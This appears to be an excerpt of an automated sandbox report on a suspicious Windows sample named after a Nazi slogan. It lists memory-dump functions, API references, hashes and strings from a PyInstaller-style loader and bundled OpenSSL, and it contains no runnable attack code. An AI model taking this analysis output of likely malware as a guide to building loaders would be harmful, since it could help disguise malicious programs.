                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4070488512-0
                                                                                                                                                                                                                                            • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                            • Instruction ID: 6ec99d33bdb44da6ecf2997ad356caa19763f127bc689be6710b0b8447883afe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03D1E426E0824246E720DFA5D8431B96762FF84794F84A235EE0DEBB95DF3CF441A740
                                                                                                                                                                                                                                            Function 00007FF633D7A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                                            • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                            • Instruction ID: d85780c84839de040bc3890f67e64cd2644d1c0eb61610f31f65aaa08a9a8677
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9331A232608F8186DB60CF64E8413AE33A4FB88758F500236EA9D97BA9DF3CD145DB00
                                                                                                                                                                                                                                            Function 00007FF633D81874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                                            • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                            • Instruction ID: 74b5afc23294b8b436fcf21b3ec6f5666c4b3d65eb5e36be9ad9fec28f369967
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85B10762B1869241EA619FA5D4025B9A390FF44BE4F446331EE5EABBC5DF3CF445D300
                                                                                                                                                                                                                                            Function 00007FFDFAF31940 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3300690313-0
                                                                                                                                                                                                                                            • Opcode ID: 55e6f5dda0f56247063ea5389dc22ddd15faef173de17707deda63e565c13c3a
                                                                                                                                                                                                                                            • Instruction ID: ec94b1d94c4d4fb9f359f834afa0cf7d29189b650e427982647f2d9bf188f4d3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55e6f5dda0f56247063ea5389dc22ddd15faef173de17707deda63e565c13c3a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47622A2272829286E7198F38D41067D7790FF58795F0456B5FAAEC77C8EA3CEA85C700
                                                                                                                                                                                                                                            Function 00007FF633D85E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EAA
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D8560C
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EBB
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855AC
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85ECC
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855DC
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF633D8610C), ref: 00007FF633D85EF3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3458911817-0
                                                                                                                                                                                                                                            • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                            • Instruction ID: 7fd548c5178028af0812a6d8c2f083bf18a1ef2463a1c9129a27f05425390cc1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C518132A0864286E710DFA5D9835B97762FB48784F446335EA4DEBB96DF3CF400A740
                                                                                                                                                                                                                                            Function 00007FFDFAE81DD4 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 451COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\_w\1\s\ssl\packet_local.h
                                                                                                                                                                                                                                            • API String ID: 3568877910-927607112
                                                                                                                                                                                                                                            • Opcode ID: f9f83aff7d1fcb132b01ba312460124729e623ed2ec6bf248ed9c149fe73d58a
                                                                                                                                                                                                                                            • Instruction ID: 5f9159a6cd23e8cbd3a63e32db0470db179edd809f2ca16f30d0caad3ae8de37
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9f83aff7d1fcb132b01ba312460124729e623ed2ec6bf248ed9c149fe73d58a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A512F572B0868185E768AB21E468ABD77A0FB84788F054175EEAE0B7CCDF7DD544CB00
                                                                                                                                                                                                                                            Function 00007FFDFAD61880 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 437COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007F767
                                                                                                                                                                                                                                            • String ID: _/yZ_&
                                                                                                                                                                                                                                            • API String ID: 1545044454-2545492802
                                                                                                                                                                                                                                            • Opcode ID: 7fa95b5cd81f519628587b04b727bd74477dff7e7dbf017e14e753301a1448cd
                                                                                                                                                                                                                                            • Instruction ID: 479458338e16449e8dd9f648669c42a81d5737500ffe9d8b6009dbc2d45aa27e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fa95b5cd81f519628587b04b727bd74477dff7e7dbf017e14e753301a1448cd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C021072B0858282E76C8F18D868E7977A5EF41784F044176EA6E877D8FE3DE541D700
                                                                                                                                                                                                                                            Function 00007FFDFAE81BE0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 235COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$resumption
                                                                                                                                                                                                                                            • API String ID: 3568877910-332775882
                                                                                                                                                                                                                                            • Opcode ID: c8ba10bbb471680328762e7b0359601313359f7ba8d38ab2e261f49fb41d8171
                                                                                                                                                                                                                                            • Instruction ID: 71a15f38903aa65a54de551a0a8753bc42f2b8946830fd3d17fd948cf1bed640
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8ba10bbb471680328762e7b0359601313359f7ba8d38ab2e261f49fb41d8171
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98B1B23270978185EB54EB25D8A4BBD67A0EB84B88F044075EE9E4BBD9CF7DD445C700
                                                                                                                                                                                                                                            Function 00007FFDFAF42B5D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastbind
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\bio\b_sock2.c
                                                                                                                                                                                                                                            • API String ID: 2328862993-3200932406
                                                                                                                                                                                                                                            • Opcode ID: c767e834a84740a79c233dcad0d39ea44b2e2a28cfc1136448b175a4500b188a
                                                                                                                                                                                                                                            • Instruction ID: 43209ef247d1958d6b715257d0260f370c8b9a833a288914f113436f2ce74c9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c767e834a84740a79c233dcad0d39ea44b2e2a28cfc1136448b175a4500b188a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78219D32B1955386E710DB26E810AAD6760FB80B98F400231EA6C47BEDDF3DE695CB40
                                                                                                                                                                                                                                            Function 00007FF633D65830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65840
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65852
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65889
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6589B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658B4
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658C6
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658DF
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658F1
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6590D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6591F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6593B
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6594D
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65969
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6597B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65997
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659A9
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659C5
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659D7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                            • API String ID: 199729137-653951865
                                                                                                                                                                                                                                            • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                            • Instruction ID: b818f33a4d21ac703cfeb5d339d36cb22e7caedded4b05944280d23af7ad1323
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB22CF64A0DB0BD1FA549BD5B8125B433A1FF15781F942335D82EAA7A1FF3CB198B200
                                                                                                                                                                                                                                            Function 00007FF633D676C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
